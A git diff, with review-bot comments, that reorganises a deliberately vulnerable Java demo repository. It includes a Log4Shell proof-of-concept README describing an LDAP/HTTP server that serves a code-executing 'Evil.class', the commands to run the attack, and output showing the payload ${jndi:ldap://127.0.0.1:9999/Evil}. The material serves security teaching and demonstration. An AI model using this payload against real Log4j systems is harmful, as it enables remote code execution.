diff --git a/README.md b/README.md index dc5bb06062..b9e44272f0 100644 --- a/README.md +++ b/README.md 
@@ -1,98 +1,8 @@ -## Log4Shell Proof of Concept +## Java Goof -The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`. +This is a collection of Java demo apps that are vulnerable in different ways. -This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/). -The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo. +It's divided into modules, each one having its own README: -For more information about the exploit and the mechanics of how it works, -[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/). - -### Requirements - -You'll need one of the following Java SDKs: - * 11.0.1 or earlier - * 8u191 or earlier - * 7u201 or earlier - * 6u211 or earlier - -Java SDKs newer than those versions don't have the same vulnerability. - -### Building the PoC - -In the root folder, run: - -``` -./mvnw clean install -``` - -**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven. - -### Running the PoC - -This repo has two modules: server and client. - -The server module runs a lean LDAP & HTTP server. - -The LDAP server listens on port `9999` by default and will return an `LDAPResult` that includes a URL reference to a -Java class that will be deserialized and executed. - -The HTTP server listens on port `8000` and responds to any request with a byte array that is the `Evil.class`. - -`Evil` implements `ObjecFactory` which the JNDI mechanism hooks into to execute its `getObjectInstance` method. While -the method simply returns `null`, it uses `Runtime` to execute arbitrary code on the host machine. In this case, it -writes to a file called: `/tmp/pwned` to prove that it _could_ execute basically anything available on the machine. - -This PoC should run as-is on Linux or Mac. 
- -Open a terminal window and run the following: - -``` -cd log4shell-server -../mvnw exec:java -Dexec.mainClass="Server" -``` - -You should see output that looks like the following: - -``` -[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-server --- -LDAP server listening on 0.0.0.0:9999 -HTTP server listening on 0.0.0.0:8000 -``` - -In another terminal window, run the following: - -``` -cd log4shell-client -JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \ -../mvnw exec:java -Dexec.mainClass="Main" -``` - -**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions. -For example, you can download JDK 8u111 -[here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html). If you download -and install the version for Mac, the above command will work for you. - -You should see output that looks like the following: - -``` -[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-client --- ----------- JVM Props ------------- -java.vm.version=25.111-b14 -java.vm.vendor=Oracle Corporation -java.vm.name=Java HotSpot(TM) 64-Bit Server VM -java.vm.specification.name=Java Virtual Machine Specification -java.vm.specification.vendor=Oracle Corporation -java.vm.specification.version=1.8 -java.vm.info=mixed mode ---------------------------------- -20:27:49.676 [Main.main()] ERROR Main - test -/tmp/pwned DOES NOT EXIST -20:27:49.679 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil} -/tmp/pwned EXISTS - yah been pwned! -``` - -**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the -`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the -client app to work properly. The file not being there and then being present after the attack is how it knows it's -been successful. 
\ No newline at end of file +* [Todolist Goof](todolist-goof/README.md) +* [Log4Shell Goof](log4shell-goof/README.md) diff --git a/log4shell-goof/README.md b/log4shell-goof/README.md index b08c620530..d5552faabc 100644 --- a/log4shell-goof/README.md +++ b/log4shell-goof/README.md @@ -1,7 +1,10 @@ -## Log4Shell Proof of Concept +## Log4Shell Goof The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`. +This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/). +The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo. + For more information about the exploit and the mechanics of how it works, [here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/). @@ -20,7 +23,7 @@ Java SDKs newer than those versions don't have the same vulnerability. In the root folder, run: ``` -./mvnw clean install +mvn clean install ``` **NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven. @@ -46,7 +49,7 @@ Open a terminal window and run the following: ``` cd log4shell-server -../mvnw exec:java -Dexec.mainClass="Server" +mvn exec:java -Dexec.mainClass="Server" ``` You should see output that looks like the following: @@ -62,7 +65,7 @@ In another terminal window, run the following: ``` cd log4shell-client JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \ -../mvnw exec:java -Dexec.mainClass="Main" +mvn exec:java -Dexec.mainClass="Main" ``` **NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions. 
@@ -92,4 +95,4 @@ java.vm.info=mixed mode **NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the `/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the client app to work properly. The file not being there and then being present after the attack is how it knows it's -been successful. \ No newline at end of file +been successful. diff --git a/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class b/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class index 7deca81203..9eca5167dc 100644 Binary files a/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class and b/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class differ diff --git a/log4shell-goof/pom.xml b/log4shell-goof/pom.xml index e902f400a4..6eb158372a 100644 --- a/log4shell-goof/pom.xml +++ b/log4shell-goof/pom.xml @@ -2,12 +2,6 @@ 4.0.0 - - java-goof - io.github.snyk - 1.0-SNAPSHOT - - io.snyk log4shell-poc 0.0.1-SNAPSHOT diff --git a/Dockerfile b/todolist-goof/Dockerfile similarity index 66% rename from Dockerfile rename to todolist-goof/Dockerfile index 1e9063df6e..d37dfaeafa 100644 --- a/Dockerfile +++ b/todolist-goof/Dockerfile @@ -8,7 +8,7 @@ RUN --mount=target=$HOME/.m2,type=cache mvn install FROM tomcat:8.5.21 RUN mkdir /tmp/extracted_files -COPY --chown=tomcat:tomcat todolist-goof/web.xml /usr/local/tomcat/conf/web.xml -COPY --from=build /usr/src/goof/todolist-goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist +COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml +COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar 
diff --git a/todolist-goof/README.md b/todolist-goof/README.md index 9e03f33bba..c458877c4d 100644 --- a/todolist-goof/README.md +++ b/todolist-goof/README.md @@ -1,4 +1,4 @@ -## Java Goof +## Todolist Goof A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc). diff --git a/todolist-goof/pom.xml b/todolist-goof/pom.xml index 5753769164..4df79d1b1b 100644 --- a/todolist-goof/pom.xml +++ b/todolist-goof/pom.xml @@ -2,12 +2,6 @@ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - - java-goof - io.github.snyk - 0.0.1-SNAPSHOT - - io.github.snyk todolist-mvc 0.0.1-SNAPSHOT diff --git a/todolist-goof/todolist-web-common/pom.xml b/todolist-goof/todolist-web-common/pom.xml index 25f60795b9..59b055ec94 100644 --- a/todolist-goof/todolist-web-common/pom.xml +++ b/todolist-goof/todolist-web-common/pom.xml @@ -38,7 +38,7 @@ io.github.snyk todolist-core - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT diff --git a/todolist-goof/todolist-web-struts/pom.xml b/todolist-goof/todolist-web-struts/pom.xml index 60ea931624..54a356000b 100644 --- a/todolist-goof/todolist-web-struts/pom.xml +++ b/todolist-goof/todolist-web-struts/pom.xml @@ -21,7 +21,7 @@ javaee-web-api - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT
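Review bot: the rewritten root README.md (the `@@ -1,98 +1,8 @@` hunk) no longer tells the reader how to build anything, while the removed text covered both the Maven wrapper and the JDK version list that the Log4Shell module depends on. Add a one-line pointer after the module list, for example `Build instructions and JDK requirements are in each module's README.`, so the index does not leave a newcomer without an entry point.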
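Review bot: the attribution paragraph added in the first log4shell-goof/README.md hunk still opens with `This repo is based on ...`, but this file now documents one module of a multi-module repository (the heading in the same hunk is renamed to `Log4Shell Goof`); change `This repo` to `This module` so it does not read as describing the whole checkout.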
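Review bot: replacing `./mvnw clean install` with `mvn clean install` in the `@@ -20,7 +23,7 @@` hunk contradicts the unchanged NOTE two lines below it, which still says the project includes the Maven wrapper so Maven does not need to be installed. Either keep invoking the wrapper or rewrite the note to say a local Maven installation is required, and since the module's parent POM reference is removed elsewhere in this change, say which directory `In the root folder` now means.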
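Review bot: the server start command in the `@@ -46,7 +49,7 @@` hunk (`mvn exec:java -Dexec.mainClass="Server"`) now also needs an installed Maven, and unlike the client step it sets no `JAVA_HOME`; document whether the server module runs on a current JDK or also needs one of the versions listed under Requirements, since a reader following the two terminal steps would otherwise assume only the client is version-sensitive.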
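Review bot: in the `@@ -62,7 +65,7 @@` hunk the `JAVA_HOME=...` prefix still works with `mvn exec:java` because the `mvn` launcher honours `JAVA_HOME`, but the path `/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home` is macOS-only while the NOTE below it talks about JDK versions generally; add a Linux example or a sentence telling the reader to point `JAVA_HOME` at whichever of the listed JDK versions they installed.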
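Review bot: `log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class` is a compiled build output tracked in git, and it changes on every build (this diff shows it as `Binary files ... differ`); remove it from the repository (`git rm --cached`) and add `target/` to `.gitignore`. A committed class file cannot be reviewed, and for a deliberately vulnerable demo the reader should be able to build every class from visible source rather than run an opaque artefact.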
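Review bot: dropping the parent coordinates (`java-goof` / `io.github.snyk` / `1.0-SNAPSHOT`) from log4shell-goof/pom.xml detaches the module from the aggregator, but no root pom.xml change appears in this diff, so it is unclear whether a top-level `mvn install` still builds `log4shell-poc`; either update the root module list in the same change or state in the README that the module builds stand-alone. The two modules previously referenced the parent at different versions (`1.0-SNAPSHOT` here, `0.0.1-SNAPSHOT` in todolist-goof/pom.xml), which looks like version drift rather than a reason to remove inheritance, and the remaining groupId `io.snyk` differs from the `io.github.snyk` used by every other module in the diff; align it unless the difference is deliberate.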
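Review bot: after the rename to `todolist-goof/Dockerfile`, `COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml` and the build-stage path `/usr/src/goof/todolist-web-struts/target/todolist` only resolve when the Docker build context is the `todolist-goof/` directory itself, and nothing in the diff documents that. Add the intended invocation to todolist-goof/README.md (for example `docker build -t todolist-goof todolist-goof/` from the repository root, or `docker build .` from inside the module); a build run with the repository root as context fails on the `COPY web.xml` step.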
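Review bot: removing the parent coordinates (`java-goof` / `io.github.snyk` / `0.0.1-SNAPSHOT`) from todolist-goof/pom.xml has the same consequence as in log4shell-goof/pom.xml: any dependencyManagement, plugin versions or properties previously inherited from the parent must now be declared locally, and the hunk adds nothing to compensate. Confirm with a clean build that the module still resolves every plugin and dependency version on its own, or keep a shared parent and fix the version mismatch instead.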
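Review bot: in todolist-web-common/pom.xml the `todolist-core` dependency is pinned to a literal `0.0.1-SNAPSHOT`, which is exactly the hard-coded sibling version that drifted to `1.0-SNAPSHOT` and needed this fix; use `${project.version}` for dependencies on reactor modules so the version follows the module's own and cannot diverge again.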
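Review bot: the todolist-web-struts/pom.xml hunk changes a dependency version from `1.0-SNAPSHOT` to `0.0.1-SNAPSHOT`, but the artifactId it belongs to lies outside the shown context (the hunk header only shows `javaee-web-api`, an external API artifact that would not carry a project SNAPSHOT version); if this is another sibling module, the same `${project.version}` substitution applies, and the commit message should name which dependency was corrected.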